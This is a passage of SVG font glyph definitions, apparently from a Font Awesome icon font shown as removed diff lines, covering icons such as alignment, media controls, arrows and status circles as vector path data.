-<glyph unicode="&#xf037;" horiz-adv-x="1792" d="M1792 192v-128q0 -26 -19 -45t-45 -19h-1664q-26 0 -45 19t-19 45v128q0 26 19 45t45 19h1664q26 0 45 -19t19 -45zM1408 576v-128q0 -26 -19 -45t-45 -19h-896q-26 0 -45 19t-19 45v128q0 26 19 45t45 19h896q26 0 45 -19t19 -45zM1664 960v-128q0 -26 -19 -45t-45 -19 h-1408q-26 0 -45 19t-19 45v128q0 26 19 45t45 19h1408q26 0 45 -19t19 -45zM1280 1344v-128q0 -26 -19 -45t-45 -19h-640q-26 0 -45 19t-19 45v128q0 26 19 45t45 19h640q26 0 45 -19t19 -45z" />
-<glyph unicode="&#xf038;" horiz-adv-x="1792" d="M1792 192v-128q0 -26 -19 -45t-45 -19h-1664q-26 0 -45 19t-19 45v128q0 26 19 45t45 19h1664q26 0 45 -19t19 -45zM1792 576v-128q0 -26 -19 -45t-45 -19h-1280q-26 0 -45 19t-19 45v128q0 26 19 45t45 19h1280q26 0 45 -19t19 -45zM1792 960v-128q0 -26 -19 -45 t-45 -19h-1536q-26 0 -45 19t-19 45v128q0 26 19 45t45 19h1536q26 0 45 -19t19 -45zM1792 1344v-128q0 -26 -19 -45t-45 -19h-1152q-26 0 -45 19t-19 45v128q0 26 19 45t45 19h1152q26 0 45 -19t19 -45z" />
-<glyph unicode="&#xf039;" horiz-adv-x="1792" d="M1792 192v-128q0 -26 -19 -45t-45 -19h-1664q-26 0 -45 19t-19 45v128q0 26 19 45t45 19h1664q26 0 45 -19t19 -45zM1792 576v-128q0 -26 -19 -45t-45 -19h-1664q-26 0 -45 19t-19 45v128q0 26 19 45t45 19h1664q26 0 45 -19t19 -45zM1792 960v-128q0 -26 -19 -45 t-45 -19h-1664q-26 0 -45 19t-19 45v128q0 26 19 45t45 19h1664q26 0 45 -19t19 -45zM1792 1344v-128q0 -26 -19 -45t-45 -19h-1664q-26 0 -45 19t-19 45v128q0 26 19 45t45 19h1664q26 0 45 -19t19 -45z" />
-<glyph unicode="&#xf03a;" horiz-adv-x="1792" d="M256 224v-192q0 -13 -9.5 -22.5t-22.5 -9.5h-192q-13 0 -22.5 9.5t-9.5 22.5v192q0 13 9.5 22.5t22.5 9.5h192q13 0 22.5 -9.5t9.5 -22.5zM256 608v-192q0 -13 -9.5 -22.5t-22.5 -9.5h-192q-13 0 -22.5 9.5t-9.5 22.5v192q0 13 9.5 22.5t22.5 9.5h192q13 0 22.5 -9.5 t9.5 -22.5zM256 992v-192q0 -13 -9.5 -22.5t-22.5 -9.5h-192q-13 0 -22.5 9.5t-9.5 22.5v192q0 13 9.5 22.5t22.5 9.5h192q13 0 22.5 -9.5t9.5 -22.5zM1792 224v-192q0 -13 -9.5 -22.5t-22.5 -9.5h-1344q-13 0 -22.5 9.5t-9.5 22.5v192q0 13 9.5 22.5t22.5 9.5h1344 q13 0 22.5 -9.5t9.5 -22.5zM256 1376v-192q0 -13 -9.5 -22.5t-22.5 -9.5h-192q-13 0 -22.5 9.5t-9.5 22.5v192q0 13 9.5 22.5t22.5 9.5h192q13 0 22.5 -9.5t9.5 -22.5zM1792 608v-192q0 -13 -9.5 -22.5t-22.5 -9.5h-1344q-13 0 -22.5 9.5t-9.5 22.5v192q0 13 9.5 22.5 t22.5 9.5h1344q13 0 22.5 -9.5t9.5 -22.5zM1792 992v-192q0 -13 -9.5 -22.5t-22.5 -9.5h-1344q-13 0 -22.5 9.5t-9.5 22.5v192q0 13 9.5 22.5t22.5 9.5h1344q13 0 22.5 -9.5t9.5 -22.5zM1792 1376v-192q0 -13 -9.5 -22.5t-22.5 -9.5h-1344q-13 0 -22.5 9.5t-9.5 22.5v192 q0 13 9.5 22.5t22.5 9.5h1344q13 0 22.5 -9.5t9.5 -22.5z" />
-<glyph unicode="&#xf03b;" horiz-adv-x="1792" d="M384 992v-576q0 -13 -9.5 -22.5t-22.5 -9.5q-14 0 -23 9l-288 288q-9 9 -9 23t9 23l288 288q9 9 23 9q13 0 22.5 -9.5t9.5 -22.5zM1792 224v-192q0 -13 -9.5 -22.5t-22.5 -9.5h-1728q-13 0 -22.5 9.5t-9.5 22.5v192q0 13 9.5 22.5t22.5 9.5h1728q13 0 22.5 -9.5 t9.5 -22.5zM1792 608v-192q0 -13 -9.5 -22.5t-22.5 -9.5h-1088q-13 0 -22.5 9.5t-9.5 22.5v192q0 13 9.5 22.5t22.5 9.5h1088q13 0 22.5 -9.5t9.5 -22.5zM1792 992v-192q0 -13 -9.5 -22.5t-22.5 -9.5h-1088q-13 0 -22.5 9.5t-9.5 22.5v192q0 13 9.5 22.5t22.5 9.5h1088 q13 0 22.5 -9.5t9.5 -22.5zM1792 1376v-192q0 -13 -9.5 -22.5t-22.5 -9.5h-1728q-13 0 -22.5 9.5t-9.5 22.5v192q0 13 9.5 22.5t22.5 9.5h1728q13 0 22.5 -9.5t9.5 -22.5z" />
-<glyph unicode="&#xf03c;" horiz-adv-x="1792" d="M352 704q0 -14 -9 -23l-288 -288q-9 -9 -23 -9q-13 0 -22.5 9.5t-9.5 22.5v576q0 13 9.5 22.5t22.5 9.5q14 0 23 -9l288 -288q9 -9 9 -23zM1792 224v-192q0 -13 -9.5 -22.5t-22.5 -9.5h-1728q-13 0 -22.5 9.5t-9.5 22.5v192q0 13 9.5 22.5t22.5 9.5h1728q13 0 22.5 -9.5 t9.5 -22.5zM1792 608v-192q0 -13 -9.5 -22.5t-22.5 -9.5h-1088q-13 0 -22.5 9.5t-9.5 22.5v192q0 13 9.5 22.5t22.5 9.5h1088q13 0 22.5 -9.5t9.5 -22.5zM1792 992v-192q0 -13 -9.5 -22.5t-22.5 -9.5h-1088q-13 0 -22.5 9.5t-9.5 22.5v192q0 13 9.5 22.5t22.5 9.5h1088 q13 0 22.5 -9.5t9.5 -22.5zM1792 1376v-192q0 -13 -9.5 -22.5t-22.5 -9.5h-1728q-13 0 -22.5 9.5t-9.5 22.5v192q0 13 9.5 22.5t22.5 9.5h1728q13 0 22.5 -9.5t9.5 -22.5z" />
-<glyph unicode="&#xf03d;" horiz-adv-x="1792" d="M1792 1184v-1088q0 -42 -39 -59q-13 -5 -25 -5q-27 0 -45 19l-403 403v-166q0 -119 -84.5 -203.5t-203.5 -84.5h-704q-119 0 -203.5 84.5t-84.5 203.5v704q0 119 84.5 203.5t203.5 84.5h704q119 0 203.5 -84.5t84.5 -203.5v-165l403 402q18 19 45 19q12 0 25 -5 q39 -17 39 -59z" />
-<glyph unicode="&#xf03e;" horiz-adv-x="1920" d="M640 960q0 -80 -56 -136t-136 -56t-136 56t-56 136t56 136t136 56t136 -56t56 -136zM1664 576v-448h-1408v192l320 320l160 -160l512 512zM1760 1280h-1600q-13 0 -22.5 -9.5t-9.5 -22.5v-1216q0 -13 9.5 -22.5t22.5 -9.5h1600q13 0 22.5 9.5t9.5 22.5v1216 q0 13 -9.5 22.5t-22.5 9.5zM1920 1248v-1216q0 -66 -47 -113t-113 -47h-1600q-66 0 -113 47t-47 113v1216q0 66 47 113t113 47h1600q66 0 113 -47t47 -113z" />
-<glyph unicode="&#xf040;" d="M363 0l91 91l-235 235l-91 -91v-107h128v-128h107zM886 928q0 22 -22 22q-10 0 -17 -7l-542 -542q-7 -7 -7 -17q0 -22 22 -22q10 0 17 7l542 542q7 7 7 17zM832 1120l416 -416l-832 -832h-416v416zM1515 1024q0 -53 -37 -90l-166 -166l-416 416l166 165q36 38 90 38 q53 0 91 -38l235 -234q37 -39 37 -91z" />
-<glyph unicode="&#xf041;" horiz-adv-x="1024" d="M768 896q0 106 -75 181t-181 75t-181 -75t-75 -181t75 -181t181 -75t181 75t75 181zM1024 896q0 -109 -33 -179l-364 -774q-16 -33 -47.5 -52t-67.5 -19t-67.5 19t-46.5 52l-365 774q-33 70 -33 179q0 212 150 362t362 150t362 -150t150 -362z" />
-<glyph unicode="&#xf042;" d="M768 96v1088q-148 0 -273 -73t-198 -198t-73 -273t73 -273t198 -198t273 -73zM1536 640q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
-<glyph unicode="&#xf043;" horiz-adv-x="1024" d="M512 384q0 36 -20 69q-1 1 -15.5 22.5t-25.5 38t-25 44t-21 50.5q-4 16 -21 16t-21 -16q-7 -23 -21 -50.5t-25 -44t-25.5 -38t-15.5 -22.5q-20 -33 -20 -69q0 -53 37.5 -90.5t90.5 -37.5t90.5 37.5t37.5 90.5zM1024 512q0 -212 -150 -362t-362 -150t-362 150t-150 362 q0 145 81 275q6 9 62.5 90.5t101 151t99.5 178t83 201.5q9 30 34 47t51 17t51.5 -17t33.5 -47q28 -93 83 -201.5t99.5 -178t101 -151t62.5 -90.5q81 -127 81 -275z" />
-<glyph unicode="&#xf044;" horiz-adv-x="1792" d="M888 352l116 116l-152 152l-116 -116v-56h96v-96h56zM1328 1072q-16 16 -33 -1l-350 -350q-17 -17 -1 -33t33 1l350 350q17 17 1 33zM1408 478v-190q0 -119 -84.5 -203.5t-203.5 -84.5h-832q-119 0 -203.5 84.5t-84.5 203.5v832q0 119 84.5 203.5t203.5 84.5h832 q63 0 117 -25q15 -7 18 -23q3 -17 -9 -29l-49 -49q-14 -14 -32 -8q-23 6 -45 6h-832q-66 0 -113 -47t-47 -113v-832q0 -66 47 -113t113 -47h832q66 0 113 47t47 113v126q0 13 9 22l64 64q15 15 35 7t20 -29zM1312 1216l288 -288l-672 -672h-288v288zM1756 1084l-92 -92 l-288 288l92 92q28 28 68 28t68 -28l152 -152q28 -28 28 -68t-28 -68z" />
-<glyph unicode="&#xf045;" horiz-adv-x="1664" d="M1408 547v-259q0 -119 -84.5 -203.5t-203.5 -84.5h-832q-119 0 -203.5 84.5t-84.5 203.5v832q0 119 84.5 203.5t203.5 84.5h255v0q13 0 22.5 -9.5t9.5 -22.5q0 -27 -26 -32q-77 -26 -133 -60q-10 -4 -16 -4h-112q-66 0 -113 -47t-47 -113v-832q0 -66 47 -113t113 -47h832 q66 0 113 47t47 113v214q0 19 18 29q28 13 54 37q16 16 35 8q21 -9 21 -29zM1645 1043l-384 -384q-18 -19 -45 -19q-12 0 -25 5q-39 17 -39 59v192h-160q-323 0 -438 -131q-119 -137 -74 -473q3 -23 -20 -34q-8 -2 -12 -2q-16 0 -26 13q-10 14 -21 31t-39.5 68.5t-49.5 99.5 t-38.5 114t-17.5 122q0 49 3.5 91t14 90t28 88t47 81.5t68.5 74t94.5 61.5t124.5 48.5t159.5 30.5t196.5 11h160v192q0 42 39 59q13 5 25 5q26 0 45 -19l384 -384q19 -19 19 -45t-19 -45z" />
-<glyph unicode="&#xf046;" horiz-adv-x="1664" d="M1408 606v-318q0 -119 -84.5 -203.5t-203.5 -84.5h-832q-119 0 -203.5 84.5t-84.5 203.5v832q0 119 84.5 203.5t203.5 84.5h832q63 0 117 -25q15 -7 18 -23q3 -17 -9 -29l-49 -49q-10 -10 -23 -10q-3 0 -9 2q-23 6 -45 6h-832q-66 0 -113 -47t-47 -113v-832 q0 -66 47 -113t113 -47h832q66 0 113 47t47 113v254q0 13 9 22l64 64q10 10 23 10q6 0 12 -3q20 -8 20 -29zM1639 1095l-814 -814q-24 -24 -57 -24t-57 24l-430 430q-24 24 -24 57t24 57l110 110q24 24 57 24t57 -24l263 -263l647 647q24 24 57 24t57 -24l110 -110 q24 -24 24 -57t-24 -57z" />
-<glyph unicode="&#xf047;" horiz-adv-x="1792" d="M1792 640q0 -26 -19 -45l-256 -256q-19 -19 -45 -19t-45 19t-19 45v128h-384v-384h128q26 0 45 -19t19 -45t-19 -45l-256 -256q-19 -19 -45 -19t-45 19l-256 256q-19 19 -19 45t19 45t45 19h128v384h-384v-128q0 -26 -19 -45t-45 -19t-45 19l-256 256q-19 19 -19 45 t19 45l256 256q19 19 45 19t45 -19t19 -45v-128h384v384h-128q-26 0 -45 19t-19 45t19 45l256 256q19 19 45 19t45 -19l256 -256q19 -19 19 -45t-19 -45t-45 -19h-128v-384h384v128q0 26 19 45t45 19t45 -19l256 -256q19 -19 19 -45z" />
-<glyph unicode="&#xf048;" horiz-adv-x="1024" d="M979 1395q19 19 32 13t13 -32v-1472q0 -26 -13 -32t-32 13l-710 710q-9 9 -13 19v-678q0 -26 -19 -45t-45 -19h-128q-26 0 -45 19t-19 45v1408q0 26 19 45t45 19h128q26 0 45 -19t19 -45v-678q4 11 13 19z" />
-<glyph unicode="&#xf049;" horiz-adv-x="1792" d="M1747 1395q19 19 32 13t13 -32v-1472q0 -26 -13 -32t-32 13l-710 710q-9 9 -13 19v-710q0 -26 -13 -32t-32 13l-710 710q-9 9 -13 19v-678q0 -26 -19 -45t-45 -19h-128q-26 0 -45 19t-19 45v1408q0 26 19 45t45 19h128q26 0 45 -19t19 -45v-678q4 11 13 19l710 710 q19 19 32 13t13 -32v-710q4 11 13 19z" />
-<glyph unicode="&#xf04a;" horiz-adv-x="1664" d="M1619 1395q19 19 32 13t13 -32v-1472q0 -26 -13 -32t-32 13l-710 710q-8 9 -13 19v-710q0 -26 -13 -32t-32 13l-710 710q-19 19 -19 45t19 45l710 710q19 19 32 13t13 -32v-710q5 11 13 19z" />
-<glyph unicode="&#xf04b;" horiz-adv-x="1408" d="M1384 609l-1328 -738q-23 -13 -39.5 -3t-16.5 36v1472q0 26 16.5 36t39.5 -3l1328 -738q23 -13 23 -31t-23 -31z" />
-<glyph unicode="&#xf04c;" d="M1536 1344v-1408q0 -26 -19 -45t-45 -19h-512q-26 0 -45 19t-19 45v1408q0 26 19 45t45 19h512q26 0 45 -19t19 -45zM640 1344v-1408q0 -26 -19 -45t-45 -19h-512q-26 0 -45 19t-19 45v1408q0 26 19 45t45 19h512q26 0 45 -19t19 -45z" />
-<glyph unicode="&#xf04d;" d="M1536 1344v-1408q0 -26 -19 -45t-45 -19h-1408q-26 0 -45 19t-19 45v1408q0 26 19 45t45 19h1408q26 0 45 -19t19 -45z" />
-<glyph unicode="&#xf04e;" horiz-adv-x="1664" d="M45 -115q-19 -19 -32 -13t-13 32v1472q0 26 13 32t32 -13l710 -710q8 -8 13 -19v710q0 26 13 32t32 -13l710 -710q19 -19 19 -45t-19 -45l-710 -710q-19 -19 -32 -13t-13 32v710q-5 -10 -13 -19z" />
-<glyph unicode="&#xf050;" horiz-adv-x="1792" d="M45 -115q-19 -19 -32 -13t-13 32v1472q0 26 13 32t32 -13l710 -710q8 -8 13 -19v710q0 26 13 32t32 -13l710 -710q8 -8 13 -19v678q0 26 19 45t45 19h128q26 0 45 -19t19 -45v-1408q0 -26 -19 -45t-45 -19h-128q-26 0 -45 19t-19 45v678q-5 -10 -13 -19l-710 -710 q-19 -19 -32 -13t-13 32v710q-5 -10 -13 -19z" />
-<glyph unicode="&#xf051;" horiz-adv-x="1024" d="M45 -115q-19 -19 -32 -13t-13 32v1472q0 26 13 32t32 -13l710 -710q8 -8 13 -19v678q0 26 19 45t45 19h128q26 0 45 -19t19 -45v-1408q0 -26 -19 -45t-45 -19h-128q-26 0 -45 19t-19 45v678q-5 -10 -13 -19z" />
-<glyph unicode="&#xf052;" horiz-adv-x="1538" d="M14 557l710 710q19 19 45 19t45 -19l710 -710q19 -19 13 -32t-32 -13h-1472q-26 0 -32 13t13 32zM1473 0h-1408q-26 0 -45 19t-19 45v256q0 26 19 45t45 19h1408q26 0 45 -19t19 -45v-256q0 -26 -19 -45t-45 -19z" />
-<glyph unicode="&#xf053;" horiz-adv-x="1152" d="M742 -37l-652 651q-37 37 -37 90.5t37 90.5l652 651q37 37 90.5 37t90.5 -37l75 -75q37 -37 37 -90.5t-37 -90.5l-486 -486l486 -485q37 -38 37 -91t-37 -90l-75 -75q-37 -37 -90.5 -37t-90.5 37z" />
-<glyph unicode="&#xf054;" horiz-adv-x="1152" d="M1099 704q0 -52 -37 -91l-652 -651q-37 -37 -90 -37t-90 37l-76 75q-37 39 -37 91q0 53 37 90l486 486l-486 485q-37 39 -37 91q0 53 37 90l76 75q36 38 90 38t90 -38l652 -651q37 -37 37 -90z" />
-<glyph unicode="&#xf055;" d="M1216 576v128q0 26 -19 45t-45 19h-256v256q0 26 -19 45t-45 19h-128q-26 0 -45 -19t-19 -45v-256h-256q-26 0 -45 -19t-19 -45v-128q0 -26 19 -45t45 -19h256v-256q0 -26 19 -45t45 -19h128q26 0 45 19t19 45v256h256q26 0 45 19t19 45zM1536 640q0 -209 -103 -385.5 t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
-<glyph unicode="&#xf056;" d="M1216 576v128q0 26 -19 45t-45 19h-768q-26 0 -45 -19t-19 -45v-128q0 -26 19 -45t45 -19h768q26 0 45 19t19 45zM1536 640q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5 t103 -385.5z" />
-<glyph unicode="&#xf057;" d="M1149 414q0 26 -19 45l-181 181l181 181q19 19 19 45q0 27 -19 46l-90 90q-19 19 -46 19q-26 0 -45 -19l-181 -181l-181 181q-19 19 -45 19q-27 0 -46 -19l-90 -90q-19 -19 -19 -46q0 -26 19 -45l181 -181l-181 -181q-19 -19 -19 -45q0 -27 19 -46l90 -90q19 -19 46 -19 q26 0 45 19l181 181l181 -181q19 -19 45 -19q27 0 46 19l90 90q19 19 19 46zM1536 640q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
-<glyph unicode="&#xf058;" d="M1284 802q0 28 -18 46l-91 90q-19 19 -45 19t-45 -19l-408 -407l-226 226q-19 19 -45 19t-45 -19l-91 -90q-18 -18 -18 -46q0 -27 18 -45l362 -362q19 -19 45 -19q27 0 46 19l543 543q18 18 18 45zM1536 640q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103 t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
-<glyph unicode="&#xf059;" d="M896 160v192q0 14 -9 23t-23 9h-192q-14 0 -23 -9t-9 -23v-192q0 -14 9 -23t23 -9h192q14 0 23 9t9 23zM1152 832q0 88 -55.5 163t-138.5 116t-170 41q-243 0 -371 -213q-15 -24 8 -42l132 -100q7 -6 19 -6q16 0 25 12q53 68 86 92q34 24 86 24q48 0 85.5 -26t37.5 -59 q0 -38 -20 -61t-68 -45q-63 -28 -115.5 -86.5t-52.5 -125.5v-36q0 -14 9 -23t23 -9h192q14 0 23 9t9 23q0 19 21.5 49.5t54.5 49.5q32 18 49 28.5t46 35t44.5 48t28 60.5t12.5 81zM1536 640q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5 t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
-<glyph unicode="&#xf05a;" d="M1024 160v160q0 14 -9 23t-23 9h-96v512q0 14 -9 23t-23 9h-320q-14 0 -23 -9t-9 -23v-160q0 -14 9 -23t23 -9h96v-320h-96q-14 0 -23 -9t-9 -23v-160q0 -14 9 -23t23 -9h448q14 0 23 9t9 23zM896 1056v160q0 14 -9 23t-23 9h-192q-14 0 -23 -9t-9 -23v-160q0 -14 9 -23 t23 -9h192q14 0 23 9t9 23zM1536 640q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
-<glyph unicode="&#xf05b;" d="M1197 512h-109q-26 0 -45 19t-19 45v128q0 26 19 45t45 19h109q-32 108 -112.5 188.5t-188.5 112.5v-109q0 -26 -19 -45t-45 -19h-128q-26 0 -45 19t-19 45v109q-108 -32 -188.5 -112.5t-112.5 -188.5h109q26 0 45 -19t19 -45v-128q0 -26 -19 -45t-45 -19h-109 q32 -108 112.5 -188.5t188.5 -112.5v109q0 26 19 45t45 19h128q26 0 45 -19t19 -45v-109q108 32 188.5 112.5t112.5 188.5zM1536 704v-128q0 -26 -19 -45t-45 -19h-143q-37 -161 -154.5 -278.5t-278.5 -154.5v-143q0 -26 -19 -45t-45 -19h-128q-26 0 -45 19t-19 45v143 q-161 37 -278.5 154.5t-154.5 278.5h-143q-26 0 -45 19t-19 45v128q0 26 19 45t45 19h143q37 161 154.5 278.5t278.5 154.5v143q0 26 19 45t45 19h128q26 0 45 -19t19 -45v-143q161 -37 278.5 -154.5t154.5 -278.5h143q26 0 45 -19t19 -45z" />
-<glyph unicode="&#xf05c;" d="M1097 457l-146 -146q-10 -10 -23 -10t-23 10l-137 137l-137 -137q-10 -10 -23 -10t-23 10l-146 146q-10 10 -10 23t10 23l137 137l-137 137q-10 10 -10 23t10 23l146 146q10 10 23 10t23 -10l137 -137l137 137q10 10 23 10t23 -10l146 -146q10 -10 10 -23t-10 -23 l-137 -137l137 -137q10 -10 10 -23t-10 -23zM1312 640q0 148 -73 273t-198 198t-273 73t-273 -73t-198 -198t-73 -273t73 -273t198 -198t273 -73t273 73t198 198t73 273zM1536 640q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5 t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
-<glyph unicode="&#xf05d;" d="M1171 723l-422 -422q-19 -19 -45 -19t-45 19l-294 294q-19 19 -19 45t19 45l102 102q19 19 45 19t45 -19l147 -147l275 275q19 19 45 19t45 -19l102 -102q19 -19 19 -45t-19 -45zM1312 640q0 148 -73 273t-198 198t-273 73t-273 -73t-198 -198t-73 -273t73 -273t198 -198 t273 -73t273 73t198 198t73 273zM1536 640q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
-<glyph unicode="&#xf05e;" d="M1312 643q0 161 -87 295l-754 -753q137 -89 297 -89q111 0 211.5 43.5t173.5 116.5t116 174.5t43 212.5zM313 344l755 754q-135 91 -300 91q-148 0 -273 -73t-198 -199t-73 -274q0 -162 89 -299zM1536 643q0 -157 -61 -300t-163.5 -246t-245 -164t-298.5 -61t-298.5 61 t-245 164t-163.5 246t-61 300t61 299.5t163.5 245.5t245 164t298.5 61t298.5 -61t245 -164t163.5 -245.5t61 -299.5z" />
-<glyph unicode="&#xf060;" d="M1536 640v-128q0 -53 -32.5 -90.5t-84.5 -37.5h-704l293 -294q38 -36 38 -90t-38 -90l-75 -76q-37 -37 -90 -37q-52 0 -91 37l-651 652q-37 37 -37 90q0 52 37 91l651 650q38 38 91 38q52 0 90 -38l75 -74q38 -38 38 -91t-38 -91l-293 -293h704q52 0 84.5 -37.5 t32.5 -90.5z" />
-<glyph unicode="&#xf061;" d="M1472 576q0 -54 -37 -91l-651 -651q-39 -37 -91 -37q-51 0 -90 37l-75 75q-38 38 -38 91t38 91l293 293h-704q-52 0 -84.5 37.5t-32.5 90.5v128q0 53 32.5 90.5t84.5 37.5h704l-293 294q-38 36 -38 90t38 90l75 75q38 38 90 38q53 0 91 -38l651 -651q37 -35 37 -90z" />
-<glyph unicode="&#xf062;" horiz-adv-x="1664" d="M1611 565q0 -51 -37 -90l-75 -75q-38 -38 -91 -38q-54 0 -90 38l-294 293v-704q0 -52 -37.5 -84.5t-90.5 -32.5h-128q-53 0 -90.5 32.5t-37.5 84.5v704l-294 -293q-36 -38 -90 -38t-90 38l-75 75q-38 38 -38 90q0 53 38 91l651 651q35 37 90 37q54 0 91 -37l651 -651 q37 -39 37 -91z" />
-<glyph unicode="&#xf063;" horiz-adv-x="1664" d="M1611 704q0 -53 -37 -90l-651 -652q-39 -37 -91 -37q-53 0 -90 37l-651 652q-38 36 -38 90q0 53 38 91l74 75q39 37 91 37q53 0 90 -37l294 -294v704q0 52 38 90t90 38h128q52 0 90 -38t38 -90v-704l294 294q37 37 90 37q52 0 91 -37l75 -75q37 -39 37 -91z" />
-<glyph unicode="&#xf064;" horiz-adv-x="1792" d="M1792 896q0 -26 -19 -45l-512 -512q-19 -19 -45 -19t-45 19t-19 45v256h-224q-98 0 -175.5 -6t-154 -21.5t-133 -42.5t-105.5 -69.5t-80 -101t-48.5 -138.5t-17.5 -181q0 -55 5 -123q0 -6 2.5 -23.5t2.5 -26.5q0 -15 -8.5 -25t-23.5 -10q-16 0 -28 17q-7 9 -13 22 t-13.5 30t-10.5 24q-127 285 -127 451q0 199 53 333q162 403 875 403h224v256q0 26 19 45t45 19t45 -19l512 -512q19 -19 19 -45z" />
-<glyph unicode="&#xf065;" d="M755 480q0 -13 -10 -23l-332 -332l144 -144q19 -19 19 -45t-19 -45t-45 -19h-448q-26 0 -45 19t-19 45v448q0 26 19 45t45 19t45 -19l144 -144l332 332q10 10 23 10t23 -10l114 -114q10 -10 10 -23zM1536 1344v-448q0 -26 -19 -45t-45 -19t-45 19l-144 144l-332 -332 q-10 -10 -23 -10t-23 10l-114 114q-10 10 -10 23t10 23l332 332l-144 144q-19 19 -19 45t19 45t45 19h448q26 0 45 -19t19 -45z" />
-<glyph unicode="&#xf066;" d="M768 576v-448q0 -26 -19 -45t-45 -19t-45 19l-144 144l-332 -332q-10 -10 -23 -10t-23 10l-114 114q-10 10 -10 23t10 23l332 332l-144 144q-19 19 -19 45t19 45t45 19h448q26 0 45 -19t19 -45zM1523 1248q0 -13 -10 -23l-332 -332l144 -144q19 -19 19 -45t-19 -45 t-45 -19h-448q-26 0 -45 19t-19 45v448q0 26 19 45t45 19t45 -19l144 -144l332 332q10 10 23 10t23 -10l114 -114q10 -10 10 -23z" />
-<glyph unicode="&#xf067;" horiz-adv-x="1408" d="M1408 800v-192q0 -40 -28 -68t-68 -28h-416v-416q0 -40 -28 -68t-68 -28h-192q-40 0 -68 28t-28 68v416h-416q-40 0 -68 28t-28 68v192q0 40 28 68t68 28h416v416q0 40 28 68t68 28h192q40 0 68 -28t28 -68v-416h416q40 0 68 -28t28 -68z" />
-<glyph unicode="&#xf068;" horiz-adv-x="1408" d="M1408 800v-192q0 -40 -28 -68t-68 -28h-1216q-40 0 -68 28t-28 68v192q0 40 28 68t68 28h1216q40 0 68 -28t28 -68z" />
-<glyph unicode="&#xf069;" horiz-adv-x="1664" d="M1482 486q46 -26 59.5 -77.5t-12.5 -97.5l-64 -110q-26 -46 -77.5 -59.5t-97.5 12.5l-266 153v-307q0 -52 -38 -90t-90 -38h-128q-52 0 -90 38t-38 90v307l-266 -153q-46 -26 -97.5 -12.5t-77.5 59.5l-64 110q-26 46 -12.5 97.5t59.5 77.5l266 154l-266 154 q-46 26 -59.5 77.5t12.5 97.5l64 110q26 46 77.5 59.5t97.5 -12.5l266 -153v307q0 52 38 90t90 38h128q52 0 90 -38t38 -90v-307l266 153q46 26 97.5 12.5t77.5 -59.5l64 -110q26 -46 12.5 -97.5t-59.5 -77.5l-266 -154z" />
-<glyph unicode="&#xf06a;" d="M768 1408q209 0 385.5 -103t279.5 -279.5t103 -385.5t-103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103zM896 161v190q0 14 -9 23.5t-22 9.5h-192q-13 0 -23 -10t-10 -23v-190q0 -13 10 -23t23 -10h192 q13 0 22 9.5t9 23.5zM894 505l18 621q0 12 -10 18q-10 8 -24 8h-220q-14 0 -24 -8q-10 -6 -10 -18l17 -621q0 -10 10 -17.5t24 -7.5h185q14 0 23.5 7.5t10.5 17.5z" />
-<glyph unicode="&#xf06b;" d="M928 180v56v468v192h-320v-192v-468v-56q0 -25 18 -38.5t46 -13.5h192q28 0 46 13.5t18 38.5zM472 1024h195l-126 161q-26 31 -69 31q-40 0 -68 -28t-28 -68t28 -68t68 -28zM1160 1120q0 40 -28 68t-68 28q-43 0 -69 -31l-125 -161h194q40 0 68 28t28 68zM1536 864v-320 q0 -14 -9 -23t-23 -9h-96v-416q0 -40 -28 -68t-68 -28h-1088q-40 0 -68 28t-28 68v416h-96q-14 0 -23 9t-9 23v320q0 14 9 23t23 9h440q-93 0 -158.5 65.5t-65.5 158.5t65.5 158.5t158.5 65.5q107 0 168 -77l128 -165l128 165q61 77 168 77q93 0 158.5 -65.5t65.5 -158.5 t-65.5 -158.5t-158.5 -65.5h440q14 0 23 -9t9 -23z" />
-<glyph unicode="&#xf06c;" horiz-adv-x="1792" d="M1280 832q0 26 -19 45t-45 19q-172 0 -318 -49.5t-259.5 -134t-235.5 -219.5q-19 -21 -19 -45q0 -26 19 -45t45 -19q24 0 45 19q27 24 74 71t67 66q137 124 268.5 176t313.5 52q26 0 45 19t19 45zM1792 1030q0 -95 -20 -193q-46 -224 -184.5 -383t-357.5 -268 q-214 -108 -438 -108q-148 0 -286 47q-15 5 -88 42t-96 37q-16 0 -39.5 -32t-45 -70t-52.5 -70t-60 -32q-30 0 -51 11t-31 24t-27 42q-2 4 -6 11t-5.5 10t-3 9.5t-1.5 13.5q0 35 31 73.5t68 65.5t68 56t31 48q0 4 -14 38t-16 44q-9 51 -9 104q0 115 43.5 220t119 184.5 t170.5 139t204 95.5q55 18 145 25.5t179.5 9t178.5 6t163.5 24t113.5 56.5l29.5 29.5t29.5 28t27 20t36.5 16t43.5 4.5q39 0 70.5 -46t47.5 -112t24 -124t8 -96z" />
